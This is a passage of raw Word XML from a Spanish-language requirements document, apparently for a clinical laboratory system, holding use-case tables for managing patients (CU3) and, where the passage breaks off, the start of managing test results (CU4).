                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D31A4F">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Postcondición</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3490" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00D31A4F" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D31A4F">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ninguno</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1510" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00D31A4F" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D31A4F">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Excepción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3490" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00D31A4F" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>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xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidRPr="00D31A4F">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Debe seleccionar al menos un caso de uso.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="007C1EFC" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="3494BA" w:themeColor="accent1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C1EFC" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="007C1EFC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="007C1EFC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="007C1EFC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E1287" w:rsidRDefault="007E1287">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="398E98" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc390457776"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C1EFC" w:rsidRPr="002A1292" w:rsidRDefault="007C1EFC" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc454371309"/>
      <w:r w:rsidRPr="002A1292">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Gestionar </w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="002A1292">
        <w:t>acientes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w:rsidR="007C1EFC" w:rsidRPr="002E7DE1" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002815B6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F026764" wp14:editId="6A451170">
            <wp:extent cx="4659916" cy="205557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8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1705" t="14238" r="3401" b="9010"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4675615" cy="206249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decuadrcula4-nfasis1"/>
        <w:tblW w:w="9063" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2693"/>
        <w:gridCol w:w="6370"/>
      </w:tblGrid>
      <w:tr w:rsidR="007C1EFC" w:rsidTr="007E1287">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Pr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00EC6643" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC6643">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Caso de Uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00EC6643" w:rsidRDefault="00491F38" w:rsidP="007C1EFC">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CU3.</w:t>
            </w:r>
            <w:r w:rsidR="007C1EFC" w:rsidRPr="00EC6643">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ge</w:t>
            </w:r>
            <w:r w:rsidR="007C1EFC">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>stionar p</w:t>
            </w:r>
            <w:r w:rsidR="007C1EFC" w:rsidRPr="00EC6643">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>acientes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC"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Pr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00C05BAF" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Propósito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00C05BAF" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Detallar</w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> información sobre los </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>paciente</w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>s.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:spacing w:line="120" w:lineRule="exact"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00C05BAF" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00C05BAF" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Permite </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>a la recepcionista</w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> registrar a los p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>acientes</w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> con su</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> respectivo nombre, fecha de nacimiento, </w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>teléfono</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> y seguro médico. Además la recepcionista podrá buscar, modificar y eliminar la información sobre los pacientes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidTr="007E1287">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Pr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00C05BAF" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Actores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00C05BAF" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Recepcionista, paciente</w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00C05BAF" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Actor Iniciador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00C05BAF" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Paciente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC"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Pr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00C05BAF" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Precondición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00C05BAF" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">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7C1EFC" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="260"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00C05BAF" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Proceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRDefault="007C1EFC" w:rsidP="00954840">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szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00324AC1">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Introducir CI.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00324AC1" w:rsidRDefault="007C1EFC" w:rsidP="00954840">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b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00324AC1">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Buscar</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C1EFC" w:rsidRDefault="007C1EFC" w:rsidP="00954840">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b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Modificar Datos</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C1EFC" w:rsidRDefault="007C1EFC" w:rsidP="00954840">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b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Guardar</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00D201B5" w:rsidRDefault="007C1EFC" w:rsidP="00954840">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szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D201B5">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Dar de Baja</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/Dar de Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC"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Pr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00C05BAF" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Postcondición</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00C05BAF" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">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7C1EFC" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00C05BAF" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Excepciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00E36ACA" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D201B5">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Existe otro paciente con el mismo nombre y apellido.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D201B5">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00491F38" w:rsidRPr="00F3368A" w:rsidRDefault="00491F38" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc454371310"/>
      <w:r>
        <w:t>Gestionar resultados</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w:rsidR="00491F38" w:rsidRPr="002E7DE1" w:rsidRDefault="00491F38" w:rsidP="00491F38">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE4A39">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76BAD2AC" wp14:editId="7830FA48">
            <wp:extent cx="4816548" cy="2104901"/>
            <wp:effectExtent l="0" t="0" r="317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8184" cy="2109986"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula4-nfasis1"/>
        <w:tblW w:w="9063" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2693"/>
        <w:gridCol w:w="6370"/>
      </w:tblGrid>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">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Caso de Uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CU4</w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>. Gestionar</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> resultados</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38"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Propósito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Detallar</w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> información sobre los </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>resultados obtenidos de los análisis realizados</w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:spacing w:line="120" w:lineRule="exact"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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sidRPr="00C05BAF">
              <w:rPr>
